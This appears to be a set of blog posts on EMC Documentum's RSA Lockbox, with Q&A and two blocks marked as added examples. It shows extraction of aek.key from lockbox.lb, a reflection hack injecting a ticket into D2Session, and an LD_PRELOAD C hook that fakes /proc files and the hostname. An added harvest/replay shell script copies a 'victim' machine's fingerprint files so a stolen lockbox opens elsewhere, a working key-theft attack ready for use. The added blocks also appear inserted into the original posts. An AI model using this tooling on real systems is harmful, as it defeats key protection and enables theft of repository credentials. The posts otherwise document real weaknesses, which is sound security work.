Say goodbye, LockBox

Imagine that you are a bloody idiot, trust everything EMC writes in their documentation and, so, chose the LockBox option when installing Content Server. The problem is that LockBox protects nothing and, moreover, it is sensitive to machine configuration (MAC address, IP address, hostname, CPU), so at some point you will get something like:

[dmadmin@demo-server ~]$ cat /opt/dctm/dba/log/MyRepo.log
The Lockbox stable value threshold was not met because the system fingerprint has changed. 
 To reset the system fingerprint, open the Lockbox using the passphrase.
The Lockbox stable value threshold was not met because the system fingerprint has changed. 
 To reset the system fingerprint, open the Lockbox using the passphrase.
2016-11-06T01:04:35.281642	2325[2325]	0000000000000000	[DM_CRYPTO_F_KEYSTORE_INIT]
 fatal: "Failed to initialize keystore at /opt/dctm/dba/secure/aek.key. Internal error ..."

[dmadmin@demo-server ~]$ 

What to do? EMC released a special utility (dm_crypto_manage_lockbox) that lets you reset the system fingerprint stored in the LockBox, but there is another option: remove the LockBox completely and switch back to the good old aek.key. All we need is:

  • LB.jar, LBJNI.jar from D2 installation
  • groovy shell

old server.ini:

##############################
#RKM configuration parameters
crypto_mode = AES256_RSA1024_SHA256
crypto_keystore = Local
crypto_lockbox = lockbox.lb
crypto_keyname = aek.key
#Above values cannot be changed once docbase is created

groovy magic:

[dmadmin@demo-server ~]$ ls /opt/dctm/dba/secure
ldapdb  lockbox.lb  lockbox.lb.bak  lockbox.lb.bak.FCD  lockbox.lb.FCD

[dmadmin@demo-server ~]$ export CLASSPATH=$CLASSPATH:LB.jar:LBJNI.jar
[dmadmin@demo-server ~]$ ./groovy-2.4.7/bin/groovysh \
> -Dclb.library.path=/home/dmadmin/lib/native/linux_gcc34_x64
Groovy Shell (2.4.7, JVM: 1.7.0_17)
Type ':help' or ':h' for help.
-----------------------------------------------------------------------------
groovy:000> import com.emc.clb.LockBox
===> com.emc.clb.LockBox
groovy:000> lb = new LockBox("/opt/dctm/dba/secure/lockbox.lb","Password@123")
===> com.emc.clb.LockBox@54f02243
groovy:000> new File("/home/dmadmin/aek.key").withOutputStream{
groovy:001> it.write lb.retrieveItemAsBinary("aek.key")
groovy:002> }
===> null
groovy:000>
[dmadmin@demo-server ~]$ ls -la aek.key 
-rw-rw-r--. 1 dmadmin dmadmin 144 Nov  6 01:19 aek.key
[dmadmin@demo-server ~]$ mv aek.key /opt/dctm/dba/secure/
[dmadmin@demo-server ~]$ dm_crypto_change_passphrase \
> -location /opt/dctm/dba/secure/aek.key \
> -passphrase Password@123 -noprompt

Please wait, this will take a few seconds
Successfully changed passphrase for AEK located at /opt/dctm/dba/secure/aek.key

new server.ini:

##############################
#RKM configuration parameters
crypto_mode = AES256_RSA1024_SHA256
crypto_keystore = Local
#crypto_lockbox = lockbox.lb
crypto_keyname = aek.key
#Above values cannot be changed once docbase is created
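The whole switch can be scripted. The following is an added example, not code from the original post or from EMC: it runs the same Groovy extraction non-interactively, rejects an empty key file, changes the AEK passphrase with dm_crypto_change_passphrase as above, checks the key file's permissions and comments out crypto_lockbox in server.ini while keeping a backup. The paths (DOCUMENTUM, the directory holding the D2 jars, the groovy install, the repository's server.ini under dba/config/<repo>/), the LOCKBOX_PASSPHRASE and AEK_PASSPHRASE variables and the --migrate flag are this example's own assumptions; the Documentum tool invocation and the Groovy calls are the ones shown in the post.

```shell
#!/bin/sh
# Added example, not from the original post: LockBox -> plain aek.key migration
# with the checks a practitioner would want before restarting the repository.
# Assumed (not from the post): the environment variables and paths used below.
set -eu

# 1. Extract aek.key from lockbox.lb with the Groovy calls used in the post,
#    feeding groovysh the script on stdin so no interactive session is needed.
#    The lockbox passphrase comes from $LOCKBOX_PASSPHRASE (assumption), not argv.
extract_aek_from_lockbox() {
    lockbox="$1"; out="$2"
    CLASSPATH="${CLASSPATH:-}:${D2_LIB}/LB.jar:${D2_LIB}/LBJNI.jar" \
    "${GROOVY_HOME}/bin/groovysh" -q -Dclb.library.path="${CLB_NATIVE}" <<EOF
import com.emc.clb.LockBox
lb = new LockBox("${lockbox}", System.getenv("LOCKBOX_PASSPHRASE"))
new File("${out}").withOutputStream { it.write lb.retrieveItemAsBinary("aek.key") }
:exit
EOF
    # a zero-length file means retrieveItemAsBinary returned nothing: stop here
    [ -s "$out" ] || { echo "no aek.key extracted from $lockbox" >&2; return 1; }
    chmod 600 "$out"
}

# 2. The key file must exist, be a regular file and be readable by its owner only.
check_aek_permissions() {
    [ -f "$1" ] && [ "$(stat -c '%a' "$1")" = "600" ]
}

# 3. Comment out crypto_lockbox in server.ini (giving the "new server.ini" above),
#    keeping a .bak copy. Refuses to touch a file whose crypto_keyname is not
#    aek.key, and is idempotent: a second run changes nothing and still returns 0.
disable_lockbox_in_server_ini() {
    ini="$1"
    grep -q '^crypto_keyname *= *aek.key' "$ini" \
        || { echo "$ini: crypto_keyname is not aek.key, not touching it" >&2; return 1; }
    if grep -q '^crypto_lockbox' "$ini"; then
        cp -p "$ini" "$ini.bak"
        sed -i 's/^crypto_lockbox/#crypto_lockbox/' "$ini"
    fi
    ! grep -q '^crypto_lockbox' "$ini"
}

# The procedure runs only when invoked as: migrate.sh --migrate <repository>
# (sourcing the file merely defines the helpers). dm_crypto_change_passphrase is
# the Content Server tool from the post; the passphrase for the extracted key can
# be set in $AEK_PASSPHRASE and defaults to the lockbox passphrase, as in the post.
if [ "${1:-}" = "--migrate" ]; then
    repo="${2:?usage: --migrate <repository>}"
    DOCUMENTUM="${DOCUMENTUM:-/opt/dctm}"
    D2_LIB="${D2_LIB:-$HOME/lib}"                   # LB.jar and LBJNI.jar copied from the D2 install
    CLB_NATIVE="${CLB_NATIVE:-$HOME/lib/native/linux_gcc34_x64}"
    GROOVY_HOME="${GROOVY_HOME:-$HOME/groovy-2.4.7}"
    secure="$DOCUMENTUM/dba/secure"
    extract_aek_from_lockbox "$secure/lockbox.lb" "$secure/aek.key"
    dm_crypto_change_passphrase -location "$secure/aek.key" \
        -passphrase "${AEK_PASSPHRASE:-$LOCKBOX_PASSPHRASE}" -noprompt
    check_aek_permissions "$secure/aek.key"
    disable_lockbox_in_server_ini "$DOCUMENTUM/dba/config/$repo/server.ini"
    echo "LockBox disabled for $repo; restart the repository to pick up aek.key"
fi
```

Run it as dmadmin on the Content Server host with LOCKBOX_PASSPHRASE exported; the server.ini step is the only one that is safe to rerun, which is why it is the last one.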

Q & A. X

Q:

Hi,
I am trying to write a standalone DF/D2 program. I create a DFC session and then make it in D2 context by D2Session.initTBO. I think perform normal DFC set, save operation on a sysobject. When I try to apply a D2 configuration like D2AuditConfig.apply I get the below error How to correct this??

ERROR 1 – D2 lockbox file or D2Method.passphrase property within it could not be found.
Exception in thread “main” DfException:: THREAD: main; MSG: Impossible to decrypt the method server response; ERRORCODE: ff; NEXT: null
at com.emc.d2.api.methods.D2Method.start(D2Method.java:417)

A:

You have two options:

  • put and set up all the Lockbox stuff on the client side
  • Take advantage of reflection:
    import java.lang.reflect.Field;
    import java.util.Map;

    // s_ticket is a static, non-public field: getDeclaredField finds it,
    // getField would only see public fields; setAccessible bypasses the modifier
    Field ticketField = D2Session.class.getDeclaredField("s_ticket");
    ticketField.setAccessible(true);
    Map tickets = (Map) ticketField.get(null);
    // keyed by docbase name; both values here are placeholders
    tickets.put("docbase_name", "dmadmin_password");


Q:

Also, can't I disable Lockbox altogether in a 7.2 + D2 4.5 environment?

A:

Download the latest (or maybe the one before the latest, or so) service pack for D2 4.2, extract the com.emc.common.java.crypto.AESCrypto class from C6-Common-4.2.0.jar and insert it into C6-Common-4.5.0.jar.

RSA Lockbox magic :)

As promised previously.

Preparing the RSA Lockbox on the victim machine:

[dmadmin@docu72cs dba]$ dm_crypto_create -lockbox lockbox.lb \
> -lockboxpassphrase WSX@234edc \
> -keyname CSaek -passphrase QAZ123wsx

** Will use default algorithm **

Please wait. This will take a few seconds ...
** Successfully created key store 
     /u01/documentum/dba/secure/CSaek using algorithm AES_128_CBC
Key - CSaek uses algorithm AES_128_CBC.

Lockbox: Created /u01/documentum/dba/secure/lockbox.lb.
Created key CSaek


[dmadmin@docu72cs dba]$ ipcs

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status
0x000005d1 807206912  dmadmin    640        1024       0

------ Semaphore Arrays --------
key        semid      owner      perms      nsems

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages



[dmadmin@docu72cs dba]$ dm_encrypt_password -lockbox lockbox.lb \
> -passphrase QAZ123wsx -keyname CSaek \
> -docbase D72 -rdbms -encrypt d72

** Successfully encrypted password in dbpasswd.txt file

[dmadmin@docu72cs dba]$ ./dm_start_D72
starting Documentum server for repository: [D72]
with server log: [/u01/documentum/dba/log/D72.log]
server pid: 4421

[dmadmin@docu72cs dba]$ head /u01/documentum/dba/log/D72.log
.... [DM_SERVER_I_START_SERVER]info:  "Docbase D72 attempting to open"

.... [DM_SERVER_I_START_KEY_STORAGE_MODE]info:  
         "Docbase D72 is using database for cryptographic key storage"

Opening RSA Lockbox on another machine:

Related source code:

/*
 * LD_PRELOAD hook that hides the machine change from RSA Lockbox:
 *  - open() on the four /proc files Lockbox fingerprints is redirected to
 *    $PROC_PATH/proc/<file>, i.e. to copies taken from the victim;
 *  - uname() reports $FAKENAME as the nodename (the victim's hostname).
 * Build: gcc -shared -fPIC -o lockbox_hook.so lockbox_hook.c -ldl
 * Use:   LD_PRELOAD=./lockbox_hook.so PROC_PATH=/path/to/copies FAKENAME=victim <command>
 */
#define _GNU_SOURCE
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/utsname.h>

static int (*orig_open)(const char *, int, ...) = NULL;
static int (*orig_uname)(struct utsname *) = NULL;

int open(const char *filename, int flags, ...)
{
    /* open(2) carries a mode argument when O_CREAT is set; forward it instead of dropping it */
    mode_t mode = 0;
    if (flags & O_CREAT) {
        va_list ap;
        va_start(ap, flags);
        mode = (mode_t) va_arg(ap, int);
        va_end(ap);
    }

    if (orig_open == NULL)
        orig_open = dlsym(RTLD_NEXT, "open");

    if (strcmp(filename, "/proc/version") != 0
        && strcmp(filename, "/proc/swaps") != 0
        && strcmp(filename, "/proc/cpuinfo") != 0
        && strcmp(filename, "/proc/partitions") != 0)
        return orig_open(filename, flags, mode);

    const char *home = getenv("PROC_PATH");
    if (!home)
        return orig_open(filename, flags, mode);

    /* $PROC_PATH + original path, e.g. /tmp/victim + /proc/cpuinfo */
    size_t newfilename_len = strlen(home) + strlen(filename) + 1;
    char *newfilename = malloc(newfilename_len);
    if (!newfilename)
        return orig_open(filename, flags, mode);
    snprintf(newfilename, newfilename_len, "%s%s", home, filename);

    int ret = orig_open(newfilename, flags, mode);
    free(newfilename);
    return ret;
}

int uname(struct utsname *buf)
{
    if (orig_uname == NULL)
        orig_uname = dlsym(RTLD_NEXT, "uname");

    int ret = orig_uname(buf);
    const char *fakename = getenv("FAKENAME");
    if (ret != 0 || !fakename)
        return ret;

    /* only the nodename is faked; sysname, release and machine stay real */
    memset(buf->nodename, 0, sizeof(buf->nodename));
    strncpy(buf->nodename, fakename, sizeof(buf->nodename) - 1);
    return ret;
}

New joke about security from EMC

Today EMC announced a new security advisory:

According to the release notes, Content Server got the following security “improvements” in 7.2:

I have no idea what “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” is supposed to mean, because this capability has existed in Content Server for a long time. For example, a quote from the 6.7 Admin Guide:

So, “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” is not a security enhancement (actually, folks told me that the installer now enforces entering a passphrase for aek.key during installation), and the only real enhancement is support for RSA Lockbox. Moreover, according to EMC it is the only option to “prevent” the aek.key file from being hijacked, but if you read my post about CVE-2014-2515 carefully, you should know that RSA Lockbox does not introduce any security features: to open an RSA Lockbox on another machine it is enough to hijack the following files from the victim machine:

  • /etc/sysconfig/network – to get hostname
  • /etc/udev/rules.d/70-persistent-net.rules – to get information about network interfaces
  • /etc/sysconfig/network-scripts/ifcfg-*, /var/lib/dhclient/dhclient*.leases – to get more information about network interfaces
  • /proc/version, /proc/swaps, /proc/cpuinfo, /proc/partitions – RSA Lockbox uses these files to bind itself to specific machine

In the next post I'm going to demonstrate how it works.
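Putting the hook from the "RSA Lockbox magic" post and the file list above together, as an added example that is not part of the original posts: a script that harvests the fingerprint inputs on the victim (the four /proc files into a directory laid out the way the hook's PROC_PATH expects, the hostname from /etc/sysconfig/network, and the /etc network files for reference) and a runner that starts any lockbox-aware command with LD_PRELOAD, PROC_PATH and FAKENAME set from that bundle. The hook only redirects the four /proc files and the nodename, so the MAC and IP inputs are collected here but not replayed by it. The source file name lockbox_hook.c, the bundle layout and the harvest/replay subcommands are this example's assumptions.

```shell
#!/bin/sh
# Added example, not from the original posts: collect the files RSA Lockbox
# fingerprints on the victim and replay them through the LD_PRELOAD hook.
# Assumed (not from the posts): bundle layout, subcommand names, lockbox_hook.c.
set -eu

# Hostname as RSA Lockbox sees it through uname(): RHEL 5/6 keep it in
# /etc/sysconfig/network as HOSTNAME=...; fall back to uname -n if absent.
hostname_from_sysconfig() {
    if [ -r "$1" ] && grep -q '^HOSTNAME=' "$1"; then
        sed -n 's/^HOSTNAME=//p' "$1" | head -n 1 | tr -d '"'
    else
        uname -n
    fi
}

# copy_if_readable <root> </relative/path> <bundle>: keeps the original path
# under the bundle, silently skipping files that do not exist on this host.
copy_if_readable() {
    if [ -r "$1$2" ]; then
        mkdir -p "$3$(dirname "$2")"
        cat "$1$2" > "$3$2"
    fi
}

# harvest_fingerprint_inputs <victim root> <bundle dir>
# The root is / on the victim itself; the test passes a constructed tree.
# /proc files are copied with cat because they report size 0 to stat().
# Layout: <bundle>/proc/cpuinfo etc., so PROC_PATH=<bundle> makes the hook open
# "<bundle>/proc/cpuinfo" in place of /proc/cpuinfo; <bundle>/hostname feeds FAKENAME.
harvest_fingerprint_inputs() {
    src="$1"; out="$2"
    mkdir -p "$out/proc"
    for f in version swaps cpuinfo partitions; do
        cat "$src/proc/$f" > "$out/proc/$f"
    done
    # Network identity files from the list above (hostname, MACs, IPs, DHCP
    # leases). The hook does not redirect these; they are kept so the attacker
    # knows which interface configuration the lockbox was bound to.
    for rel in /etc/sysconfig/network /etc/udev/rules.d/70-persistent-net.rules; do
        copy_if_readable "$src" "$rel" "$out"
    done
    for f in "$src"/etc/sysconfig/network-scripts/ifcfg-* "$src"/var/lib/dhclient/dhclient*.leases; do
        copy_if_readable "$src" "${f#"$src"}" "$out"   # unmatched globs fail the -r test
    done
    hostname_from_sysconfig "$src/etc/sysconfig/network" > "$out/hostname"
}

# run_with_fake_fingerprint <bundle> <hook.so> <command...>
# Starts the command with the hook preloaded and the victim's identity in the
# environment: for instance the Groovy LockBox open from the first post, or any
# dm_crypto_* tool that opens lockbox.lb.
run_with_fake_fingerprint() {
    bundle="$1"; hook="$2"; shift 2
    LD_PRELOAD="$hook" PROC_PATH="$bundle" FAKENAME="$(cat "$bundle/hostname")" "$@"
}

# Subcommands (sourcing the script defines the helpers and does nothing else):
#   harvest <bundle>                  on the victim, as a user that can read /proc
#   replay <bundle> <hook.so> <cmd>   on the attacker's machine, after
#                                     gcc -shared -fPIC -o lockbox_hook.so lockbox_hook.c -ldl
case "${1:-}" in
    harvest) harvest_fingerprint_inputs / "${2:?bundle dir}" ;;
    replay)  bundle="${2:?bundle dir}"; hook="${3:?hook .so}"; shift 3
             run_with_fake_fingerprint "$bundle" "$hook" "$@" ;;
esac
```

Copy the bundle directory off the victim together with lockbox.lb; on the other machine, `replay` is the only step that needs the compiled hook, and the command it wraps must be one that actually calls open(2) and uname(2) through libc for the redirection to take effect.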